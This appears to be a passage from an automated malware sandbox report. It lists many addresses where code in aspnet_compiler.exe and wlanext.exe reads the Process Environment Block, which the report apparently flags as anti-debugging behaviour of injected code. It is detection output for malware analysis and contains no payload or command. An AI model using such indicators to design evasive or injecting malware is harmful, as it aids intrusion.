      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01192D8A mov eax, dword ptr fs:[00000030h]1_2_01192D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2581 mov eax, dword ptr fs:[00000030h]1_2_011C2581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2581 mov eax, dword ptr fs:[00000030h]1_2_011C2581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2581 mov eax, dword ptr fs:[00000030h]1_2_011C2581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2581 mov eax, dword ptr fs:[00000030h]1_2_011C2581
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C1DB5 mov eax, dword ptr fs:[00000030h]1_2_011C1DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C1DB5 mov eax, dword ptr fs:[00000030h]1_2_011C1DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C1DB5 mov eax, dword ptr fs:[00000030h]1_2_011C1DB5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C35A1 mov eax, dword ptr fs:[00000030h]1_2_011C35A1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125FDE2 mov eax, dword ptr fs:[00000030h]1_2_0125FDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125FDE2 mov eax, dword ptr fs:[00000030h]1_2_0125FDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125FDE2 mov eax, dword ptr fs:[00000030h]1_2_0125FDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125FDE2 mov eax, dword ptr fs:[00000030h]1_2_0125FDE2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01248DF1 mov eax, dword ptr fs:[00000030h]1_2_01248DF1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216DC9 mov eax, dword ptr fs:[00000030h]1_2_01216DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216DC9 mov eax, dword ptr fs:[00000030h]1_2_01216DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216DC9 mov eax, dword ptr fs:[00000030h]1_2_01216DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216DC9 mov ecx, dword ptr fs:[00000030h]1_2_01216DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216DC9 mov eax, dword ptr fs:[00000030h]1_2_01216DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216DC9 mov eax, dword ptr fs:[00000030h]1_2_01216DC9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AD5E0 mov eax, dword ptr fs:[00000030h]1_2_011AD5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AD5E0 mov eax, dword ptr fs:[00000030h]1_2_011AD5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251C06 mov eax, dword ptr fs:[00000030h]1_2_01251C06
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0126740D mov eax, dword ptr fs:[00000030h]1_2_0126740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0126740D mov eax, dword ptr fs:[00000030h]1_2_0126740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0126740D mov eax, dword ptr fs:[00000030h]1_2_0126740D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216C0A mov eax, dword ptr fs:[00000030h]1_2_01216C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216C0A mov eax, dword ptr fs:[00000030h]1_2_01216C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216C0A mov eax, dword ptr fs:[00000030h]1_2_01216C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216C0A mov eax, dword ptr fs:[00000030h]1_2_01216C0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CBC2C mov eax, dword ptr fs:[00000030h]1_2_011CBC2C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CA44B mov eax, dword ptr fs:[00000030h]1_2_011CA44B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122C450 mov eax, dword ptr fs:[00000030h]1_2_0122C450
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122C450 mov eax, dword ptr fs:[00000030h]1_2_0122C450
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B746D mov eax, dword ptr fs:[00000030h]1_2_011B746D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A849B mov eax, dword ptr fs:[00000030h]1_2_011A849B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216CF0 mov eax, dword ptr fs:[00000030h]1_2_01216CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216CF0 mov eax, dword ptr fs:[00000030h]1_2_01216CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01216CF0 mov eax, dword ptr fs:[00000030h]1_2_01216CF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012514FB mov eax, dword ptr fs:[00000030h]1_2_012514FB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01268CD6 mov eax, dword ptr fs:[00000030h]1_2_01268CD6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BF716 mov eax, dword ptr fs:[00000030h]1_2_011BF716
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CA70E mov eax, dword ptr fs:[00000030h]1_2_011CA70E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CA70E mov eax, dword ptr fs:[00000030h]1_2_011CA70E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0126070D mov eax, dword ptr fs:[00000030h]1_2_0126070D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0126070D mov eax, dword ptr fs:[00000030h]1_2_0126070D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CE730 mov eax, dword ptr fs:[00000030h]1_2_011CE730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122FF10 mov eax, dword ptr fs:[00000030h]1_2_0122FF10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122FF10 mov eax, dword ptr fs:[00000030h]1_2_0122FF10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01194F2E mov eax, dword ptr fs:[00000030h]1_2_01194F2E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01194F2E mov eax, dword ptr fs:[00000030h]1_2_01194F2E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01268F6A mov eax, dword ptr fs:[00000030h]1_2_01268F6A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AEF40 mov eax, dword ptr fs:[00000030h]1_2_011AEF40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AFF60 mov eax, dword ptr fs:[00000030h]1_2_011AFF60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A8794 mov eax, dword ptr fs:[00000030h]1_2_011A8794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01217794 mov eax, dword ptr fs:[00000030h]1_2_01217794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01217794 mov eax, dword ptr fs:[00000030h]1_2_01217794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01217794 mov eax, dword ptr fs:[00000030h]1_2_01217794
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D37F5 mov eax, dword ptr fs:[00000030h]1_2_011D37F5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CA61C mov eax, dword ptr fs:[00000030h]1_2_011CA61C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CA61C mov eax, dword ptr fs:[00000030h]1_2_011CA61C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119C600 mov eax, dword ptr fs:[00000030h]1_2_0119C600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119C600 mov eax, dword ptr fs:[00000030h]1_2_0119C600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119C600 mov eax, dword ptr fs:[00000030h]1_2_0119C600
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0124FE3F mov eax, dword ptr fs:[00000030h]1_2_0124FE3F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C8E00 mov eax, dword ptr fs:[00000030h]1_2_011C8E00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01251608 mov eax, dword ptr fs:[00000030h]1_2_01251608
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119E620 mov eax, dword ptr fs:[00000030h]1_2_0119E620
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A7E41 mov eax, dword ptr fs:[00000030h]1_2_011A7E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A7E41 mov eax, dword ptr fs:[00000030h]1_2_011A7E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A7E41 mov eax, dword ptr fs:[00000030h]1_2_011A7E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A7E41 mov eax, dword ptr fs:[00000030h]1_2_011A7E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A7E41 mov eax, dword ptr fs:[00000030h]1_2_011A7E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A7E41 mov eax, dword ptr fs:[00000030h]1_2_011A7E41
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125AE44 mov eax, dword ptr fs:[00000030h]1_2_0125AE44
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125AE44 mov eax, dword ptr fs:[00000030h]1_2_0125AE44
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BAE73 mov eax, dword ptr fs:[00000030h]1_2_011BAE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BAE73 mov eax, dword ptr fs:[00000030h]1_2_011BAE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BAE73 mov eax, dword ptr fs:[00000030h]1_2_011BAE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BAE73 mov eax, dword ptr fs:[00000030h]1_2_011BAE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BAE73 mov eax, dword ptr fs:[00000030h]1_2_011BAE73
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A766D mov eax, dword ptr fs:[00000030h]1_2_011A766D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01260EA5 mov eax, dword ptr fs:[00000030h]1_2_01260EA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01260EA5 mov eax, dword ptr fs:[00000030h]1_2_01260EA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01260EA5 mov eax, dword ptr fs:[00000030h]1_2_01260EA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012146A7 mov eax, dword ptr fs:[00000030h]1_2_012146A7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122FE87 mov eax, dword ptr fs:[00000030h]1_2_0122FE87
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C36CC mov eax, dword ptr fs:[00000030h]1_2_011C36CC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D8EC7 mov eax, dword ptr fs:[00000030h]1_2_011D8EC7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0124FEC0 mov eax, dword ptr fs:[00000030h]1_2_0124FEC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01268ED6 mov eax, dword ptr fs:[00000030h]1_2_01268ED6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A76E2 mov eax, dword ptr fs:[00000030h]1_2_011A76E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C16E0 mov ecx, dword ptr fs:[00000030h]1_2_011C16E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00C7B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00C7B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00C7B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00C7B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00C7B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C7B8D0 mov eax, dword ptr fs:[00000030h]3_2_00C7B8D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9080 mov eax, dword ptr fs:[00000030h]3_2_00BE9080
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C63884 mov eax, dword ptr fs:[00000030h]3_2_00C63884
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C63884 mov eax, dword ptr fs:[00000030h]3_2_00C63884
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE58EC mov eax, dword ptr fs:[00000030h]3_2_00BE58EC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C120A0 mov eax, dword ptr fs:[00000030h]3_2_00C120A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C120A0 mov eax, dword ptr fs:[00000030h]3_2_00C120A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C120A0 mov eax, dword ptr fs:[00000030h]3_2_00C120A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C120A0 mov eax, dword ptr fs:[00000030h]3_2_00C120A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C120A0 mov eax, dword ptr fs:[00000030h]3_2_00C120A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C120A0 mov eax, dword ptr fs:[00000030h]3_2_00C120A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C290AF mov eax, dword ptr fs:[00000030h]3_2_00C290AF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1F0BF mov ecx, dword ptr fs:[00000030h]3_2_00C1F0BF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1F0BF mov eax, dword ptr fs:[00000030h]3_2_00C1F0BF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1F0BF mov eax, dword ptr fs:[00000030h]3_2_00C1F0BF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C00050 mov eax, dword ptr fs:[00000030h]3_2_00C00050
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C00050 mov eax, dword ptr fs:[00000030h]3_2_00C00050
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFB02A mov eax, dword ptr fs:[00000030h]3_2_00BFB02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFB02A mov eax, dword ptr fs:[00000030h]3_2_00BFB02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFB02A mov eax, dword ptr fs:[00000030h]3_2_00BFB02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFB02A mov eax, dword ptr fs:[00000030h]3_2_00BFB02A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CA2073 mov eax, dword ptr fs:[00000030h]3_2_00CA2073
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB1074 mov eax, dword ptr fs:[00000030h]3_2_00CB1074
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C67016 mov eax, dword ptr fs:[00000030h]3_2_00C67016
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C67016 mov eax, dword ptr fs:[00000030h]3_2_00C67016
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C67016 mov eax, dword ptr fs:[00000030h]3_2_00C67016
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB4015 mov eax, dword ptr fs:[00000030h]3_2_00CB4015
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CB4015 mov eax, dword ptr fs:[00000030h]3_2_00CB4015
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1002D mov eax, dword ptr fs:[00000030h]3_2_00C1002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1002D mov eax, dword ptr fs:[00000030h]3_2_00C1002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1002D mov eax, dword ptr fs:[00000030h]3_2_00C1002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1002D mov eax, dword ptr fs:[00000030h]3_2_00C1002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1002D mov eax, dword ptr fs:[00000030h]3_2_00C1002D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C741E8 mov eax, dword ptr fs:[00000030h]3_2_00C741E8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0C182 mov eax, dword ptr fs:[00000030h]3_2_00C0C182
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1A185 mov eax, dword ptr fs:[00000030h]3_2_00C1A185
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12990 mov eax, dword ptr fs:[00000030h]3_2_00C12990
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]3_2_00BEB1E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]3_2_00BEB1E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEB1E1 mov eax, dword ptr fs:[00000030h]3_2_00BEB1E1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C669A6 mov eax, dword ptr fs:[00000030h]3_2_00C669A6
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C161A0 mov eax, dword ptr fs:[00000030h]3_2_00C161A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C161A0 mov eax, dword ptr fs:[00000030h]3_2_00C161A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C651BE mov eax, dword ptr fs:[00000030h]3_2_00C651BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C651BE mov eax, dword ptr fs:[00000030h]3_2_00C651BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C651BE mov eax, dword ptr fs:[00000030h]3_2_00C651BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C651BE mov eax, dword ptr fs:[00000030h]3_2_00C651BE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0B944 mov eax, dword ptr fs:[00000030h]3_2_00C0B944
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C0B944 mov eax, dword ptr fs:[00000030h]3_2_00C0B944
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9100 mov eax, dword ptr fs:[00000030h]3_2_00BE9100
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9100 mov eax, dword ptr fs:[00000030h]3_2_00BE9100
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE9100 mov eax, dword ptr fs:[00000030h]3_2_00BE9100
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEB171 mov eax, dword ptr fs:[00000030h]3_2_00BEB171
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEB171 mov eax, dword ptr fs:[00000030h]3_2_00BEB171
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEC962 mov eax, dword ptr fs:[00000030h]3_2_00BEC962
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C04120 mov eax, dword ptr fs:[00000030h]3_2_00C04120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C04120 mov eax, dword ptr fs:[00000030h]3_2_00C04120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C04120 mov eax, dword ptr fs:[00000030h]3_2_00C04120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C04120 mov eax, dword ptr fs:[00000030h]3_2_00C04120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C04120 mov ecx, dword ptr fs:[00000030h]3_2_00C04120
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1513A mov eax, dword ptr fs:[00000030h]3_2_00C1513A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1513A mov eax, dword ptr fs:[00000030h]3_2_00C1513A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12ACB mov eax, dword ptr fs:[00000030h]3_2_00C12ACB
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]3_2_00BFAAB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BFAAB0 mov eax, dword ptr fs:[00000030h]3_2_00BFAAB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE52A5 mov eax, dword ptr fs:[00000030h]3_2_00BE52A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE52A5 mov eax, dword ptr fs:[00000030h]3_2_00BE52A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE52A5 mov eax, dword ptr fs:[00000030h]3_2_00BE52A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE52A5 mov eax, dword ptr fs:[00000030h]3_2_00BE52A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BE52A5 mov eax, dword ptr fs:[00000030h]3_2_00BE52A5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C12AE4 mov eax, dword ptr fs:[00000030h]3_2_00C12AE4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1D294 mov eax, dword ptr fs:[00000030h]3_2_00C1D294
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1D294 mov eax, dword ptr fs:[00000030h]3_2_00C1D294
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C1FAB0 mov eax, dword ptr fs:[00000030h]3_2_00C1FAB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C74257 mov eax, dword ptr fs:[00000030h]3_2_00C74257
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00CAEA55 mov eax, dword ptr fs:[00000030h]3_2_00CAEA55
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEAA16 mov eax, dword ptr fs:[00000030h]3_2_00BEAA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00BEAA16 mov eax, dword ptr fs:[00000030h]3_2_00BEAA16
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_00C9B260 mov eax, dword ptr fs:[00000030h]3_2_00C9B260
